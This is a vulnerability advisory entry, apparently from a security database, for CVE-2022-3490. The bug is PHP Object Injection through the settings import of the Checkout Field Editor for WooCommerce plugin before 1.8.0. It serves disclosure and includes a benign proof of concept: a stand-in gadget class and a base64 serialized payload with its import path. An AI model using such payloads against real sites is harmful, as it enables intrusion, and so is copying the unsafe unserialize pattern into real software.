Lucene search
Nguyen Duy Quoc KhanhWPEX-ID:0C9F22E0-1D46-4957-9BA5-5CCA78861136HistoryNov 07, 2022 - 12:00 a.m.
Checkout Field Editor for WooCommerce < 1.8.0 - Admin+ PHP Object Injection
2022-11-0700:00:00
Nguyen Duy Quoc Khanh
129
woocommerce
checkout field editor
php object injection
import settings
security exploit
EPSS
0.001
Percentile
43.0%
The plugin unserialize user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present
To simulate a gadget chain, put the following code in a plugin
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
Then import the following payload via WooCommerce > Checkout Form > Advanced Settings > Backup and Import Settings: Tzo0OiJFdmlsIjowOnt9Ow==
Tzo0OiJFdmlsIjowOnt9Ow== being the base64 encode of serialized object: O:4:"Evil":0:{};Related
wpvulndb
wpvulndb
Checkout Field Editor for WooCommerce < 1.8.0 - Admin+ PHP Object Injection
2022-11-07 00:00:00
openvas
openvas
cnvd
cnvd
prion
prion
Design/Logic Flaw
2022-11-28 14:15:00
cvelist
cvelist
nvd
nvd
CVE-2022-3490
2022-11-28 14:15:12
patchstack
patchstack
cve
cve
CVE-2022-3490
2022-11-28 14:15:12